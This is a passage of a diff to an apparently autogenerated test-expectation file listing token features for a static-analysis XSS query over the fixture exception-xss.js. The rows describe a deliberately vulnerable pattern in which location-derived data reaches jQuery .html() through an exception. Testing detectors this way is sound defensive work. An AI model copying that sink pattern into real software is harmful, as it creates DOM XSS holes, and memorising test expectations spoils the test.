contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:64:3:64:11 | $('myId') | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:64:3:64:11 | $('myId') | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:64:3:64:11 | $('myId') | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:64:3:64:11 | exceptional return of $('myId') | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:64:3:64:11 | exceptional return of $('myId') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:64:3:64:11 | exceptional return of $('myId') | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:64:3:64:11 | exceptional return of $('myId') | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:64:3:64:11 | exceptional return of $('myId') | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:64:3:64:16 | $('myId').html | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:64:3:64:16 | $('myId').html | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:64:3:64:16 | $('myId').html | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:64:3:64:16 | $('myId').html | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:64:3:64:16 | $('myId').html | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:64:3:64:19 | $('myId').html(e) | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:64:3:64:19 | $('myId').html(e) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:64:3:64:19 | $('myId').html(e) | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:64:3:64:19 | $('myId').html(e) | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:64:3:64:19 | $('myId').html(e) | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:64:3:64:19 | exceptional return of $('myId').html(e) | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:64:3:64:19 | exceptional return of $('myId').html(e) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:64:3:64:19 | exceptional return of $('myId').html(e) | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:64:3:64:19 | exceptional return of $('myId').html(e) | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:64:3:64:19 | exceptional return of $('myId').html(e) | fileImports | express fs | | autogenerated/Xss/ExceptionXss/exception-xss.js:64:5:64:10 | 'myId' | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/ExceptionXss/exception-xss.js:64:5:64:10 | 'myId' | InputArgumentIndex | 0 | | autogenerated/Xss/ExceptionXss/exception-xss.js:64:5:64:10 | 'myId' | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | @@ -18942,6 +128707,11 @@ tokenFeatures | autogenerated/Xss/ExceptionXss/exception-xss.js:64:5:64:10 | 'myId' | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | | autogenerated/Xss/ExceptionXss/exception-xss.js:64:5:64:10 | 'myId' | enclosingFunctionName | | | autogenerated/Xss/ExceptionXss/exception-xss.js:64:5:64:10 | 'myId' | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:64:13:64:16 | html | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:64:13:64:16 | html | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:64:13:64:16 | html | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:64:13:64:16 | html | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:64:13:64:16 | html | fileImports | express fs | | autogenerated/Xss/ExceptionXss/exception-xss.js:64:18:64:18 | e | CalleeFlexibleAccessPath | $().html | | autogenerated/Xss/ExceptionXss/exception-xss.js:64:18:64:18 | e | InputArgumentIndex | 0 | | autogenerated/Xss/ExceptionXss/exception-xss.js:64:18:64:18 | e | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | @@ -18949,6 +128719,36 @@ tokenFeatures | autogenerated/Xss/ExceptionXss/exception-xss.js:64:18:64:18 | e | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | | autogenerated/Xss/ExceptionXss/exception-xss.js:64:18:64:18 | e | enclosingFunctionName | | | autogenerated/Xss/ExceptionXss/exception-xss.js:64:18:64:18 | e | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:68:3:68:6 | safe | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:68:3:68:6 | safe | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:68:3:68:6 | safe | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:68:3:68:6 | safe | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:68:3:68:6 | safe | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:68:3:68:11 | safe.call | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:68:3:68:11 | safe.call | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:68:3:68:11 | safe.call | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:68:3:68:11 | safe.call | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:68:3:68:11 | safe.call | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:68:3:68:22 | exceptional return of safe.call(null, foo) | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:68:3:68:22 | exceptional return of safe.call(null, foo) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:68:3:68:22 | exceptional return of safe.call(null, foo) | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:68:3:68:22 | exceptional return of safe.call(null, foo) | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:68:3:68:22 | exceptional return of safe.call(null, foo) | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:68:3:68:22 | reflective call | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:68:3:68:22 | reflective call | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:68:3:68:22 | reflective call | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:68:3:68:22 | reflective call | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:68:3:68:22 | reflective call | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:68:3:68:22 | safe.call(null, foo) | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:68:3:68:22 | safe.call(null, foo) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:68:3:68:22 | safe.call(null, foo) | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:68:3:68:22 | safe.call(null, foo) | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:68:3:68:22 | safe.call(null, foo) | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:68:8:68:11 | call | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:68:8:68:11 | call | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:68:8:68:11 | call | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:68:8:68:11 | call | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:68:8:68:11 | call | fileImports | express fs | | autogenerated/Xss/ExceptionXss/exception-xss.js:68:13:68:16 | null | CalleeFlexibleAccessPath | safe.call | | autogenerated/Xss/ExceptionXss/exception-xss.js:68:13:68:16 | null | InputArgumentIndex | 0 | | autogenerated/Xss/ExceptionXss/exception-xss.js:68:13:68:16 | null | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | @@ -18967,6 +128767,46 @@ tokenFeatures | autogenerated/Xss/ExceptionXss/exception-xss.js:68:19:68:21 | foo | enclosingFunctionName | | | autogenerated/Xss/ExceptionXss/exception-xss.js:68:19:68:21 | foo | fileImports | express fs | | autogenerated/Xss/ExceptionXss/exception-xss.js:68:19:68:21 | foo | receiverName | safe | +| autogenerated/Xss/ExceptionXss/exception-xss.js:69:11:69:11 | e | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:69:11:69:11 | e | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:69:11:69:11 | e | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:69:11:69:11 | e | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:69:11:69:11 | e | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:69:11:69:11 | e | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:69:11:69:11 | e | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:69:11:69:11 | e | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:69:11:69:11 | e | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:69:11:69:11 | e | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:70:3:70:3 | $ | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:70:3:70:3 | $ | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:70:3:70:3 | $ | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:70:3:70:3 | $ | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:70:3:70:3 | $ | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:70:3:70:11 | $('myId') | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:70:3:70:11 | $('myId') | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:70:3:70:11 | $('myId') | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:70:3:70:11 | $('myId') | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:70:3:70:11 | $('myId') | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:70:3:70:11 | exceptional return of $('myId') | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:70:3:70:11 | exceptional return of $('myId') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:70:3:70:11 | exceptional return of $('myId') | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:70:3:70:11 | exceptional return of $('myId') | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:70:3:70:11 | exceptional return of $('myId') | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:70:3:70:16 | $('myId').html | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:70:3:70:16 | $('myId').html | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:70:3:70:16 | $('myId').html | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:70:3:70:16 | $('myId').html | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:70:3:70:16 | $('myId').html | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:70:3:70:19 | $('myId').html(e) | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:70:3:70:19 | $('myId').html(e) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:70:3:70:19 | $('myId').html(e) | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:70:3:70:19 | $('myId').html(e) | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:70:3:70:19 | $('myId').html(e) | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:70:3:70:19 | exceptional return of $('myId').html(e) | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:70:3:70:19 | exceptional return of $('myId').html(e) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:70:3:70:19 | exceptional return of $('myId').html(e) | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:70:3:70:19 | exceptional return of $('myId').html(e) | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:70:3:70:19 | exceptional return of $('myId').html(e) | fileImports | express fs | | autogenerated/Xss/ExceptionXss/exception-xss.js:70:5:70:10 | 'myId' | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/ExceptionXss/exception-xss.js:70:5:70:10 | 'myId' | InputArgumentIndex | 0 | | autogenerated/Xss/ExceptionXss/exception-xss.js:70:5:70:10 | 'myId' | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | @@ -18974,6 +128814,11 @@ tokenFeatures | autogenerated/Xss/ExceptionXss/exception-xss.js:70:5:70:10 | 'myId' | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | | autogenerated/Xss/ExceptionXss/exception-xss.js:70:5:70:10 | 'myId' | enclosingFunctionName | | | autogenerated/Xss/ExceptionXss/exception-xss.js:70:5:70:10 | 'myId' | fileImports | express fs | +| autogenerated/Xss/ExceptionXss/exception-xss.js:70:13:70:16 | html | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | +| autogenerated/Xss/ExceptionXss/exception-xss.js:70:13:70:16 | html | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/ExceptionXss/exception-xss.js:70:13:70:16 | html | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | +| autogenerated/Xss/ExceptionXss/exception-xss.js:70:13:70:16 | html | enclosingFunctionName | | +| autogenerated/Xss/ExceptionXss/exception-xss.js:70:13:70:16 | html | fileImports | express fs | | autogenerated/Xss/ExceptionXss/exception-xss.js:70:18:70:18 | e | CalleeFlexibleAccessPath | $().html | | autogenerated/Xss/ExceptionXss/exception-xss.js:70:18:70:18 | e | InputArgumentIndex | 0 | | autogenerated/Xss/ExceptionXss/exception-xss.js:70:18:70:18 | e | contextFunctionInterfaces | deep(x)\ndeep2(x)\ninner(tainted, resolve)\ninner(x)\nmyWeirdInner(x)\nsafe(x) | @@ -18981,6 +128826,128 @@ tokenFeatures | autogenerated/Xss/ExceptionXss/exception-xss.js:70:18:70:18 | e | enclosingFunctionBody | foo document location inner x unknown x unknown foo e $ myId html e inner foo e $ myId html e unknown foo bar e $ myId html e unknown prop foo e $ myId html e unknown bar foo e $ myId html e deep x deep2 x deep2 x inner x deep bar foo e $ myId html e tmp bar foo e $ myId html e safe x foo x bar safe foo e $ myId html e safe call null foo e $ myId html e myWeirdInner myWeirdInner x inner x e $ myId html e myWeirdInner foo e $ myId html e $ myId html foo unknown foo match /foo/ e $ myId html e unknown foo bar e $ myId html e unknown foo e $ myId html e | | autogenerated/Xss/ExceptionXss/exception-xss.js:70:18:70:18 | e | enclosingFunctionName | | | autogenerated/Xss/ExceptionXss/exception-xss.js:70:18:70:18 